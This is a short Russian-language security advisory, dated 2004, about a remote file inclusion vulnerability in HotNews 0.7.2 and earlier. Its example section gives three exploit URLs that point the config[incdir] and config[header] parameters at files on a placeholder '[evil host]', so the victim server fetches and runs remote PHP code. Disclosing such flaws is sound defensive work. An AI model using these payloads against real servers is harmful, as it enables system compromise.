Security Lab

Удаленное выполнение произвольного кода в HotNews

Дата публикации:08.01.2004
Всего просмотров:1202
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: HotNews 0.x
Уязвимые версии: HotNews 0.7.2 и более ранние версии

Описание: Уязвимость включения файлов обнаружена в HotNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Уязвимость обнаружена в 'config["header"]' переменной в 'hotnews-engine.inc.php3' файле и в 'config["incdir"]' переменной в 'hnmain.inc.php3' файле. В результате удаленный пользователь может включить произвольный удаленный файл, который будет включен и выполнен на целевой системе с привилегиями Web сервера.

Пример/Эксплоит:

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evi l host]/func.inc.php3

http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3

http://[victim]/includes/hotnews-engine.inc.p hp3?config[header]=http://[evil host]/[evil file]

URL производителя: http://sourceforge.net/projects/hotnews/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: HotNews arbitary file inclusion